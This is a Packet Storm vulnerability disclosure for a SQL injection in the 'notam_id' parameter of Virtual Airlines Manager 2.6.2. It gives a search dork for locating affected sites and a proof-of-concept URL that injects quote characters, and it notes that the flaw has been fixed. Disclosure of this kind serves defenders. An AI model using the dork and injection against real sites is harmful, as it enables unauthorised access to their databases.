Virtual Airlines Manager 2.6.2 SQL Injection

2020-06-07T00:00:00
ID PACKETSTORM:157961
Type packetstorm
Reporter Pankaj Kumar Thakur
Modified 2020-06-07T00:00:00

Description

                                        
                                            `# Exploit Title: Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection  
# Date: 2020-06-07  
# Exploit Author: Pankaj Kumar Thakur  
# Vendor Homepage: http://virtualairlinesmanager.net/  
# Dork: inurl:notam_id=  
# Affected Version: 2.6.2  
# Tested on: Ubuntu  
# CVE : N/A  
  
Vulnerable parameter   
-------------------  
notam_id=%27%27  
  
Id parameter's value is going into sql query directly!  
  
Proof of concept  
---------------  
https://localhost:8080/vam/index.php?page=notam&notam_id=11%27%27  
  
  
Submitted: Jun 1 2020  
Fixed: Jun 5 2020  
Acknowledgement : https://ibb.co/Y3WYdFN  
`